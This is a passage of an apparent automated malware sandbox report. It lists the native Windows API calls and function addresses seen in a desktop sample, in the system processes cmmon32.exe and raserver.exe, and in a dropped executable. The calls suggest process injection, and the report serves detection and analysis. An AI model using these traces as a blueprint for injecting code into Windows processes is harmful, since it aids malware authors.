          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00ECA3E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA3D0 NtCreateKey,LdrInitializeThunk,4_2_00ECA3D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00ECA360
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA350 NtQueryValueKey,LdrInitializeThunk,4_2_00ECA350
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_00ECA310
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECACE0 NtCreateMutant,LdrInitializeThunk,4_2_00ECACE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA480 NtMapViewOfSection,LdrInitializeThunk,4_2_00ECA480
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA470 NtSetInformationFile,LdrInitializeThunk,4_2_00ECA470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA410 NtQueryInformationToken,LdrInitializeThunk,4_2_00ECA410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_00ECA560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA540 NtDelayExecution,LdrInitializeThunk,4_2_00ECA540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA6A0 NtCreateSection,LdrInitializeThunk,4_2_00ECA6A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00ECA610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA750 NtCreateFile,LdrInitializeThunk,4_2_00ECA750
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECB0B0 NtGetContextThread,4_2_00ECB0B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA2F0 NtQueryInformationFile,4_2_00ECA2F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA220 NtWaitForSingleObject,4_2_00ECA220
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECBA30 NtSetContextThread,4_2_00ECBA30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA370 NtQueryInformationProcess,4_2_00ECA370
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA4A0 NtUnmapViewOfSection,4_2_00ECA4A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA460 NtOpenProcess,4_2_00ECA460
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECB470 NtOpenThread,4_2_00ECB470
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA430 NtQueryVirtualMemory,4_2_00ECA430
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECB410 NtOpenProcessToken,4_2_00ECB410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA5F0 NtReadVirtualMemory,4_2_00ECA5F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA5A0 NtWriteVirtualMemory,4_2_00ECA5A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECBD40 NtSuspendThread,4_2_00ECBD40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA520 NtEnumerateKey,4_2_00ECA520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA6D0 NtCreateProcessEx,4_2_00ECA6D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA650 NtQueueApcThread,4_2_00ECA650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA780 NtOpenDirectoryObject,4_2_00ECA780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA720 NtResumeThread,4_2_00ECA720
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA700 NtProtectVirtualMemory,4_2_00ECA700
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA710 NtQuerySection,4_2_00ECA710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956BC0 NtCreateFile,4_2_00956BC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956CF0 NtClose,4_2_00956CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956C70 NtReadFile,4_2_00956C70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956DA0 NtAllocateVirtualMemory,4_2_00956DA0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00956BBB NtCreateFile,4_2_00956BBB
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 17_2_03D71CF1 NtProtectVirtualMemory,17_2_03D71CF1
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A240 NtReadFile,LdrInitializeThunk,18_2_2026A240
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A2D0 NtClose,LdrInitializeThunk,18_2_2026A2D0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A360 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_2026A360
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A3E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_2026A3E0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A410 NtQueryInformationToken,LdrInitializeThunk,18_2_2026A410
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A4A0 NtUnmapViewOfSection,LdrInitializeThunk,18_2_2026A4A0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A480 NtMapViewOfSection,LdrInitializeThunk,18_2_2026A480
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A560 NtQuerySystemInformation,LdrInitializeThunk,18_2_2026A560
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A540 NtDelayExecution,LdrInitializeThunk,18_2_2026A540
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A5F0 NtReadVirtualMemory,LdrInitializeThunk,18_2_2026A5F0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A610 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_2026A610
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A6A0 NtCreateSection,LdrInitializeThunk,18_2_2026A6A0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A720 NtResumeThread,LdrInitializeThunk,18_2_2026A720
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A700 NtProtectVirtualMemory,LdrInitializeThunk,18_2_2026A700
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A750 NtCreateFile,LdrInitializeThunk,18_2_2026A750
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A800 NtSetValueKey,18_2_2026A800
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026B0B0 NtGetContextThread,18_2_2026B0B0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A220 NtWaitForSingleObject,18_2_2026A220
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026BA30 NtSetContextThread,18_2_2026BA30
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A260 NtWriteFile,18_2_2026A260
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A2F0 NtQueryInformationFile,18_2_2026A2F0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A310 NtEnumerateValueKey,18_2_2026A310
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A370 NtQueryInformationProcess,18_2_2026A370
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A350 NtQueryValueKey,18_2_2026A350
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A3D0 NtCreateKey,18_2_2026A3D0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A430 NtQueryVirtualMemory,18_2_2026A430
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026B410 NtOpenProcessToken,18_2_2026B410
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A460 NtOpenProcess,18_2_2026A460
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A470 NtSetInformationFile,18_2_2026A470
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026B470 NtOpenThread,18_2_2026B470
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026ACE0 NtCreateMutant,18_2_2026ACE0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A520 NtEnumerateKey,18_2_2026A520
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026BD40 NtSuspendThread,18_2_2026BD40
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A5A0 NtWriteVirtualMemory,18_2_2026A5A0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A650 NtQueueApcThread,18_2_2026A650
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A6D0 NtCreateProcessEx,18_2_2026A6D0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A710 NtQuerySection,18_2_2026A710
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2026A780 NtOpenDirectoryObject,18_2_2026A780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434ACE0 NtCreateMutant,LdrInitializeThunk,19_2_0434ACE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A560 NtQuerySystemInformation,LdrInitializeThunk,19_2_0434A560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A610 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_0434A610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A2D0 NtClose,LdrInitializeThunk,19_2_0434A2D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A360 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_0434A360
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A3E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_0434A3E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A430 NtQueryVirtualMemory,19_2_0434A430
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434B410 NtOpenProcessToken,19_2_0434B410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A410 NtQueryInformationToken,19_2_0434A410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A470 NtSetInformationFile,19_2_0434A470
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434B470 NtOpenThread,19_2_0434B470
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A460 NtOpenProcess,19_2_0434A460
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A4A0 NtUnmapViewOfSection,19_2_0434A4A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A480 NtMapViewOfSection,19_2_0434A480
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A520 NtEnumerateKey,19_2_0434A520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434BD40 NtSuspendThread,19_2_0434BD40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A540 NtDelayExecution,19_2_0434A540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A5A0 NtWriteVirtualMemory,19_2_0434A5A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A5F0 NtReadVirtualMemory,19_2_0434A5F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A650 NtQueueApcThread,19_2_0434A650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A6A0 NtCreateSection,19_2_0434A6A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A6D0 NtCreateProcessEx,19_2_0434A6D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A720 NtResumeThread,19_2_0434A720
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A710 NtQuerySection,19_2_0434A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A700 NtProtectVirtualMemory,19_2_0434A700
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A750 NtCreateFile,19_2_0434A750
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A780 NtOpenDirectoryObject,19_2_0434A780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A800 NtSetValueKey,19_2_0434A800
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434B0B0 NtGetContextThread,19_2_0434B0B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434BA30 NtSetContextThread,19_2_0434BA30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A220 NtWaitForSingleObject,19_2_0434A220
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A260 NtWriteFile,19_2_0434A260
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A240 NtReadFile,19_2_0434A240
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A2F0 NtQueryInformationFile,19_2_0434A2F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A310 NtEnumerateValueKey,19_2_0434A310
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A370 NtQueryInformationProcess,19_2_0434A370
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A350 NtQueryValueKey,19_2_0434A350
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0434A3D0 NtCreateKey,19_2_0434A3D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003B6BC0 NtCreateFile,19_2_003B6BC0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003B6C70 NtReadFile,19_2_003B6C70
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003B6CF0 NtClose,19_2_003B6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003B6DA0 NtAllocateVirtualMemory,19_2_003B6DA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003B6BBB NtCreateFile,19_2_003B6BBB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 0_2_03D513DE0_2_03D513DE
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_0041B0EB2_2_0041B0EB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_004078EE2_2_004078EE
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_004078F02_2_004078F0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_0041B08A2_2_0041B08A
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_0041A22E2_2_0041A22E
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_0041ADD82_2_0041ADD8
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00419DF62_2_00419DF6
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00419F632_2_00419F63
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A98102_2_201A9810
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2023D0162_2_2023D016
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201AE0202_2_201AE020
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A00212_2_201A0021
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A10702_2_201A1070
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202218B62_2_202218B6
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2018A0802_2_2018A080
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202428E82_2_202428E8
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A48CB2_2_201A48CB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A71102_2_201A7110
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201C99062_2_201C9906
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A594B2_2_201A594B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2024D9BE2_2_2024D9BE
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A61802_2_201A6180
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202419E22_2_202419E2
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202361DF2_2_202361DF
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20230A022_2_20230A02
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A523D2_2_201A523D
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2024E2142_2_2024E214
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A4A5B2_2_201A4A5B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201942B02_2_201942B0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20241A992_2_20241A99
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202422DD2_2_202422DD
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2019FB402_2_2019FB40
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A4B962_2_201A4B96
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A63C22_2_201A63C2
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2017EBE02_2_2017EBE0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2022F42B2_2_2022F42B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201914102_2_20191410
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2018740C2_2_2018740C
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A547E2_2_201A547E
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202334902_2_20233490
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20241C9F2_2_20241C9F
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20242C9A2_2_20242C9A
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202344EF2_2_202344EF
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2023DCC52_2_2023DCC5
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2021C53F2_2_2021C53F
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201915302_2_20191530
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20231D1B2_2_20231D1B
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202425192_2_20242519
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20170D402_2_20170D40
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2023E5812_2_2023E581
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2021E58A2_2_2021E58A
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20221DE32_2_20221DE3
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2023D5D22_2_2023D5D2
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2022FDDB2_2_2022FDDB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A66112_2_201A6611
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_2023CE662_2_2023CE66
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201976402_2_20197640
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A5E702_2_201A5E70
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201A4E612_2_201A4E61
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20233E962_2_20233E96
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202426F82_2_202426F8
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202417462_2_20241746
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201957902_2_20195790
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_202327822_2_20232782
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_20241FCE2_2_20241FCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F528E84_2_00F528E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB48CB4_2_00EB48CB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F318B64_2_00F318B6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00E9A0804_2_00E9A080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB10704_2_00EB1070
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EBE0204_2_00EBE020
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F4D0164_2_00F4D016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB98104_2_00EB9810
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F519E24_2_00F519E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F461DF4_2_00F461DF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F5D9BE4_2_00F5D9BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB61804_2_00EB6180
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB594B4_2_00EB594B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ED99064_2_00ED9906
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB71104_2_00EB7110
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F522DD4_2_00F522DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EA42B04_2_00EA42B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F51A994_2_00F51A99
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB4A5B4_2_00EB4A5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB523D4_2_00EB523D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F5E2144_2_00F5E214
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F40A024_2_00F40A02
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00E8EBE04_2_00E8EBE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB63C24_2_00EB63C2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB4B964_2_00EB4B96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EAFB404_2_00EAFB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F444EF4_2_00F444EF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F4DCC54_2_00F4DCC5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F434904_2_00F43490
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F51C9F4_2_00F51C9F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F52C9A4_2_00F52C9A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB547E4_2_00EB547E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F3F42B4_2_00F3F42B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00E9740C4_2_00E9740C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EA14104_2_00EA1410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F31DE34_2_00F31DE3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F4D5D24_2_00F4D5D2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F3FDDB4_2_00F3FDDB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F4E5814_2_00F4E581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F2E58A4_2_00F2E58A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00E80D404_2_00E80D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F2C53F4_2_00F2C53F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EA15304_2_00EA1530
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F525194_2_00F52519
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F41D1B4_2_00F41D1B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F526F84_2_00F526F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F43E964_2_00F43E96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB4E614_2_00EB4E61
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F4CE664_2_00F4CE66
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB5E704_2_00EB5E70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EA76404_2_00EA7640
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EB66114_2_00EB6611
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00E867D04_2_00E867D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F51FCE4_2_00F51FCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F427824_2_00F42782
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00EA57904_2_00EA5790
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00F517464_2_00F51746
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_009478F04_2_009478F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_009478EE4_2_009478EE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0095ADD84_2_0095ADD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00959DF64_2_00959DF6
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 17_2_03D713DE17_2_03D713DE
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025002118_2_20250021
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025E02018_2_2025E020
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025981018_2_20259810
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202ED01618_2_202ED016
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025107018_2_20251070
